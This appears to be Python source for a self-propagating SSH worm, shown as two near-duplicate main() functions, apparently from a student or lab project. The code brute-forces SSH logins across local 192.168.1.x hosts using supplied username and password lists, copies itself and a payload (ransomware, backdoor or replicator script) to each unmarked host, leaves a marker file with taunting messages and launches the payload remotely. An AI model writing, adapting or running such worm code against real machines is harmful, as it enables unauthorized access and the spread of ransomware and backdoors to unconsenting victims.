def main(): """ Main function that does all the heavy lifting. Very similar to replicator """ malicious_file = "local_attack.py" marker_file = "ransom_marker.txt" # Grab files with usernames and passwords parser = argparse.ArgumentParser() parser.add_argument("usernames", nargs=1, help="File of usernames to try", type=str) parser.add_argument("passwords", nargs=1, help="File of passwords to try", type=str) args = parser.parse_args() worm = SSHConnection() # Consider changing this to allow files in other directories to be used ? username_file = os.path.basename(args.usernames[0]) password_file = os.path.basename(args.passwords[0]) worm.set_files([malicious_file, username_file, password_file]) # Create worm instance and search first 10 ips on the network worm.retrieve_vulnerable_hosts("192.168.1.", 10) # Set the file the worm will look for on the target system worm.set_worm_file(marker_file) if worm.find_target_host(): # ound an unmarked host, copy the iles over to it. worm.set_target_dir("/home/" + worm.username + "/") transfer_file(worm, malicious_file) transfer_file(worm, __file__) transfer_file(worm, "SSHConnection.py") transfer_file(worm, username_file) transfer_file(worm, password_file) print ("[+] Completed! Launching local attack now...") worm.ssh_connection.exec_command("echo " + get_local_ip() + " >> " + marker_file) launch_attack(worm, malicious_file) else: print (" :( No target found, better get a job! ")
def main(): """ Main function that does all the heavy lifting. See usage details above """ worm = SSHConnection() # # # Arguments Reference # # # # # # # # # # # # # # # # # # # # # # current_script = sys.argv[0] # local_attacker = sys.argv[1] or empty for standard replication # marker_file = sys.argv[2] # username_file = sys.argv[3] # password_file = sys.argv[4] # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # files = [] for filename in sys.argv: files.append(filename) files.append("SSHConnection.py") # Runnning ansomware worm if files[1] == "local_ransom.py": worm.marker_file = "ransom_marker.txt" worm.set_username_file(files[2]) worm.set_password_file(files[3]) worm.set_worm_file("local_ransom.py") malicious_file = files[1] message = "Help plz I need money to feed my cats :( \n" # Running backdoo worm elif files[1] == "local_backdoor.py": worm.marker_file = "backdoor_marker.txt" worm.set_username_file(files[2]) worm.set_password_file(files[3]) worm.set_worm_file("local_backdoor.py") malicious_file = files[1] message = "This is a super imporant file that under no circumstances should you delete\n" # Running standad replicator worm elif files[1] == "usernames.txt": worm.marker_file = "replicator_marker.txt" worm.set_username_file(files[1]) worm.set_password_file(files[2]) #worm.worm_file = "replicator.py" worm.set_worm_file("replicator.py") malicious_file = "replicator.py " + worm.username_file + " " + worm.password_file message = "Your security is bad and you should feel bad\n" else: print "Bad input file" return #files.append(worm.marker_file) # Create worm instance and search first 10 ips on the network worm.retrieve_vulnerable_hosts("192.168.1.", 10) # Set the file the worm will look for on the target system if worm.find_target_host(): # Found an unmarked host, copy the files over to it. worm.set_target_dir("/home/" + worm.username + "/") #with open(worm.marker_file, "w") as marker: # marker.write(message) for filename in files: transfer_file(worm, filename) print "[+] Completed! Launching local attack now..." # Optinal command to add infector's ip to the marker file #worm.ssh_connection.exec_command("echo " + get_local_ip() + " >> " + worm.marker_file) worm.ssh_connection.exec_command("touch " + worm.marker_file) worm.ssh_connection.exec_command("echo \"" + message + "\" >> " + worm.marker_file) launch_attack(worm, malicious_file) else: # Either no hosts found, or they all had the marker file on their system print " :( No target found, better get a job!"